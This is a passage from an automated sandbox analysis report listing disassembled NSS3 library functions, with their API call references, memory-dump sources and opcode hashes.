Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5EAB3E,?,?), ref: 6C5EAC70

Part of subcall function 6C5CE300: TlsGetValue.KERNEL32 ref: 6C5CE33C
Part of subcall function 6C5CE300: EnterCriticalSection.KERNEL32(?), ref: 6C5CE350
Part of subcall function 6C5CE300: PR_Unlock.NSS3(?), ref: 6C5CE5BC
Part of subcall function 6C5CE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C5CE5CA
Part of subcall function 6C5CE300: TlsGetValue.KERNEL32 ref: 6C5CE5F2
Part of subcall function 6C5CE300: EnterCriticalSection.KERNEL32(?), ref: 6C5CE606
Part of subcall function 6C5CE300: PORT_Alloc_Util.NSS3(?), ref: 6C5CE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C5EAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5EAB3E), ref: 6C5EACD7
PORT_Alloc_Util.NSS3(?), ref: 6C5EAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C5EAD2B

Part of subcall function 6C5CF360: TlsGetValue.KERNEL32(00000000,?,6C5EA904,?), ref: 6C5CF38B
Part of subcall function 6C5CF360: EnterCriticalSection.KERNEL32(?,?,?,6C5EA904,?), ref: 6C5CF3A0
Part of subcall function 6C5CF360: PR_Unlock.NSS3(?,?,?,?,6C5EA904,?), ref: 6C5CF3D3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: fd0bc66782fc23a5afe493462d9e0a6e6d8babe2b0ce671d09294ff5beb4d75a
Instruction ID: f27059d9018eb7686b3837f6364f4b0dffb668f2cef565506b67a8bfd18afd9f
Opcode Fuzzy Hash: fd0bc66782fc23a5afe493462d9e0a6e6d8babe2b0ce671d09294ff5beb4d75a
Instruction Fuzzy Hash: ED3128B1E002059FEB00CF698C419AF7BB6AFD9718B198528F81957740EB31AC15C7A1

Function 6C5C8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C5C8C7C

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5C8CB0
TlsGetValue.KERNEL32 ref: 6C5C8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C5C8CE5
PR_Unlock.NSS3(?), ref: 6C5C8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C5C8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C8D93

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: e143afea6d1e2b2de0e7aa37f56d767dd3dea5b4c7c1366a7a46b738ee7feac7
Instruction ID: bd2a74a4b45aa3b0fcb5122233f2ec1af199fe6c85866cfc00cb3f00b1152ae5
Opcode Fuzzy Hash: e143afea6d1e2b2de0e7aa37f56d767dd3dea5b4c7c1366a7a46b738ee7feac7
Instruction Fuzzy Hash: 4D312671B01601AFE7009FA8DC4479AB7B4BF55318F14053EEA1A67B50DB70A968C7C7

Function 6C609D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C609C5B), ref: 6C609D82

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C609C5B), ref: 6C609DA9

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60136A
Part of subcall function 6C601340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60137E
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?), ref: 6C6013CF
Part of subcall function 6C601340: PR_Unlock.NSS3(?,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C609C5B), ref: 6C609DCE

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C6013F0
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,?,?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C601445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C609C5B), ref: 6C609DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C609C5B), ref: 6C609DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C609C5B), ref: 6C609E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C609C5B), ref: 6C609E91

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Part of subcall function 6C601560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C5FFAAB,00000000), ref: 6C60157E
Part of subcall function 6C601560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5FFAAB,00000000), ref: 6C601592
Part of subcall function 6C601560: memset.VCRUNTIME140(?,00000000,?), ref: 6C601600
Part of subcall function 6C601560: PL_ArenaRelease.NSS3(?,?), ref: 6C601620
Part of subcall function 6C601560: PR_Unlock.NSS3(?), ref: 6C601639

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 5f1a401cbf0ab28d4c3503af6c804e809c6036c47c49745167884a77f1cad6c2
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 004181B4601606AFE748DF15DA40B92BBA2FF4534CF148128D9195BFA0EB72E835CF94

Function 6C5CDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5CDDEC

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

PK11_DigestBegin.NSS3(00000000), ref: 6C5CDE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C5CDE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C5CDE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C5CDEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5CDEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CDECC

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 890e7da7a5e563baa93b4b419f647c5fd09eb1daf234eea525f9dbfe886dee21
Instruction ID: 5c9d0071d5cb28c4bd7ab81137fd98a62a33207e3a060d7981e5471c2393bce1
Opcode Fuzzy Hash: 890e7da7a5e563baa93b4b419f647c5fd09eb1daf234eea525f9dbfe886dee21
Instruction Fuzzy Hash: D831B9B6A40114ABDB00AEA5AC41BBB76A89F95708F050129ED05E7701F731DD18C6E3

Function 6C5A7E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5A7E48

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C5A7E5B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A7E7B

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C925C,?), ref: 6C5A7E92

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A7EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C5A7ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C5A7EFA

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 4965e3e02052c4677d19b6eaad043b3b7ec1cce5f01a031b706728c3d9db2ca3
Instruction ID: 4915acb47649db4d384abe13bea767bf82acb13efc1562230dba1c5b57f624e5
Opcode Fuzzy Hash: 4965e3e02052c4677d19b6eaad043b3b7ec1cce5f01a031b706728c3d9db2ca3
Instruction Fuzzy Hash: 4C31B1B2E012119BEB10CBBA9D40B5B77E8AF45298F194924ED55EBB05F730EC05CBE4

Function 6C5FDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5FDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5FDCAD

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 1a1ec4a7abaeff6a817f9f2a12f17eed6df1be379baadbbe4820e3eef1f2065c
Instruction ID: 9ca04b9cbdf91e5ef3156c7d9ac892be7bb4a2b984d9e147198e214fa64ef2bb
Opcode Fuzzy Hash: 1a1ec4a7abaeff6a817f9f2a12f17eed6df1be379baadbbe4820e3eef1f2065c
Instruction Fuzzy Hash: BF318DB5A002009FD714CF19DC90B52B7F8AF25358F148428E968CBB00E7B2E945CFA1

Function 6C5C2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C5BE728,?,00000038,?,?,00000000), ref: 6C5C2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C5C2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C5C2E9E
PR_Unlock.NSS3(?), ref: 6C5C2EAB
PR_Unlock.NSS3(?), ref: 6C5C2F0D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: b1b41146fb0fb4f99093565be6ae63a61c794ec6019fe21e68a0e4fb97687475
Instruction ID: 67885d11cf19fa601e005c8fec53fc26557f9f0cae74a52024008bc55b3624eb
Opcode Fuzzy Hash: b1b41146fb0fb4f99093565be6ae63a61c794ec6019fe21e68a0e4fb97687475
Instruction Fuzzy Hash: 313108B9B00105ABEB00AF69DC85876BB79FF45258F048578EC1897B11EB31EC64C7D2

Function 6C5E1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&^l,6C5C6295,?,00000000,?,00000001,S&^l,?), ref: 6C5E1ECB

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&^l,6C5C6295,?,00000000,?,00000001,S&^l,?), ref: 6C5E1EF1
EnterCriticalSection.KERNEL32(?), ref: 6C5E1F01
PR_SetError.NSS3(00000000,00000000), ref: 6C5E1F39

Part of subcall function 6C5EFE20: TlsGetValue.KERNEL32(6C5C5ADC,?,00000000,00000001,?,?,00000000,?,6C5BBA55,?,?), ref: 6C5EFE4B
Part of subcall function 6C5EFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5EFE5F

PR_Unlock.NSS3(?), ref: 6C5E1F67

Strings

S&^l, xrefs: 6C5E1EA0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&^l
API String ID: 704537481-2751469739
Opcode ID: 01be0cb9f9f24515b1830f0248d3edeea61163fd1017e7560cf2131b4a1c936d
Instruction ID: b1d3a08bb862c95cab4a8f2636f4cb4666ed023de8cc68bb8d346faebf226dc3
Opcode Fuzzy Hash: 01be0cb9f9f24515b1830f0248d3edeea61163fd1017e7560cf2131b4a1c936d
Instruction Fuzzy Hash: E021F675A04204ABEB00EF29EC85E9B3769EF89368F144564FD2887B12EB31DD54C7E1

Function 6C60CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C60CD93,?), ref: 6C60CEEE

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C60CD93,?), ref: 6C60CEFC

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C60CD93,?), ref: 6C60CF0B

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C60CD93,?), ref: 6C60CF1D

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C60CD93,?,?,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF78

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 2a9be3c7daa3a2be0a54131965ccc662af9690ed4845223deb4bd6f0a2338aea
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 9311D8B1B00204A7E7085B666E41B6B76EC9F4524DF004039FC0AE7741FB60D90886BB

Function 6C5B8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5B8C1B
EnterCriticalSection.KERNEL32 ref: 6C5B8C34
PL_ArenaAllocate.NSS3 ref: 6C5B8C65
PR_Unlock.NSS3 ref: 6C5B8C9C
PR_Unlock.NSS3 ref: 6C5B8CB6

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Strings

KRAM, xrefs: 6C5B8C8F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 0413d226379aaa1d8f52684c83c2379eead684cc3538975c26ecde4efea28bf7
Instruction ID: 40d25e05fec05686a80bd8dd6acc0b88f6de498fd37c88a1803e0da6139eb8a3
Opcode Fuzzy Hash: 0413d226379aaa1d8f52684c83c2379eead684cc3538975c26ecde4efea28bf7
Instruction Fuzzy Hash: AD218DB5A05A028FD700AF79C894559BBF4FF55304F05896ED8889B711EB31E889CBC6

Function 6C5C8E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EA2

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EC3
TlsGetValue.KERNEL32(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5C8EF1
PR_Unlock.NSS3 ref: 6C5C8F20

Strings

b.^l, xrefs: 6C5C8E96, 6C5C8F25

Memory Dump Source

